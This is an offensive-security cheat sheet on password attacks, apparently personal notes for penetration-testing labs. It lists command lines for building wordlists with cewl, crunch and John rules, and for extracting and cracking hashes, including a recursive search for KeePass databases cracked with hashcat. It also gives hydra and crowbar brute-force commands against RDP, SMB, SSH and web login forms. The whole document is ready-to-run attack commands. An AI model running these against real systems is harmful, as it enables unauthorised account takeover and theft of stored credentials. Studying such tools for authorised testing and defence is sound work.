-
generating wordlist based on information from a website
cewl <domain> -w wordlist.txt
-
Character Translation
@ = Lower case alpha characters
, = Upper case alpha characters
% = Numeric characters
^ = Special characters including space
-
Usage
./crunch <min-len> <max-len> [charset]
-
basic examples
crunch 9 9 -t ,@@@@^%%%
crunch 4 6 0123456789abcdef -o wordlist.txt
-
Add the rules you want in the /etc/john/john.conf file inside the rules module [List.Rules:Wordlist] to modify your wordlists
-> basic rule example $@$[1-2]$[0-9]$[0-9]$[0-9]
john --wordlist=wordlist.txt --rules --stdout > mutated.txt
https://www.openwall.com/john/doc/RULES.shtml
hashid <hash>
https://www.tunnelsup.com/hash-analyzer/https://hashes.com/en/tools/hash_identifier
- ssh2john
- rar2john
- zip2john
- keepass2john
- office2john
- pdf2john
- pwsafe2john
- racf2john
- vncpcap2john
- hccap2jjohn
- keychain2john
- mozilla2john
-
Search KeePass database files
Get-ChildItem -Path C:\\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
-
Hashing the .kdbx file
keepass2john Database.kdbx > keepass.hash
-
Finding Hash-Mode ID of hashcat
hashcat --help | grep -i "KeePass"
-
Cracking
hashcat -m 13400 keepass.hash
hydra -L /usr/share/wordlists/rockyou.txt t -p "<password" rdp://<IP>
crowbar -b rdp -s X.X.X.X/32 -u admin -C /usr/share/wordlists/rockyou.txt -n 1
hydra -L /root/Desktop/user.txt -P /usr/share/wordlists/rockyou.txt <IP> smb
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<IP>
hydra -l <user> -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/login.php:user=admin&pass=^PASS^:Invalid Login" -vV -f
hydra -l <username> -P /usr/share/wordlists/rockyou.txt -f <IP> http-get /login